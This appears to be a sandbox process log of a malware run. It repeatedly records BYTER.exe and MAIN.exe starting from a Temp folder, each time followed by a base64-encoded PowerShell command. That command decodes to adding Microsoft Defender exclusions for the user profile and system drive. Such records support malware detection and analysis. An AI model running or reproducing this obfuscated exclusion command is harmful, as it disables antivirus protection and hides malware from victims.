"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
